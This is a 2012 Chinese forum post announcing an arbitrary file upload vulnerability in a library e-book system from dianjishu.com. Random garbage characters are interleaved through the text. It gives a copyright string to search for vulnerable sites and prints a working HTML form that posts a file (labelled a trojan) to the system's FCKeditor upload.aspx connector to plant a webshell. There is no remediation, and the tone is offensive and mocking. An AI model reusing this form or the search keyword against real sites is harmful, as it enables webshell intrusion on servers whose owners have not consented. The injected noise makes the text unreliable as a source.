主题:图书馆系统任意文件上传漏洞$ D5 V, C( q. D0 b% K! C
作者:冰锋刺客
Z9 I% g S! K* o8 Y 厂商:点击书(dianjishu.com)
/ W4 G# u8 U2 @% F$ M/ f 日期:2012-6-21+ r3 _3 p! F& J$ d6 E' @: B
4 \3 W1 ]% a( Z# `7 z& }& Z
I 概述; [, K8 F l5 K( c
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
- O5 {! d( S$ n( Q5 M/ j1 B II 简介
_5 {9 x4 t! v 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
* h2 {. b9 U, ?- Z, E! p/ @4 L0 e 补充一个漏洞 ]3 S7 e# M+ X/ }- [
<form id="frmUpload" enctype="multipart/form-data"
: {- D- N' Y4 O! h" F action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
! b: t; f7 f s* U+ F A <input id="btnUpload" type="submit" value="操翻他">
% i9 B/ H0 l5 }/ M% ^% L' G9 c) b </form>" W/ p$ U* l9 w
你们懂的7 w; u* j3 `& N8 |0 A
那傻逼提供还需要改包.
: @ q+ \* X8 s& I# T 自己看了下源代码发现fckeditor
S% }/ y1 ^& z0 V: \! G 直接秒杀: \+ I! L+ f# I
|
发表于 2012-9-10 21:20:59
收藏
支持
反对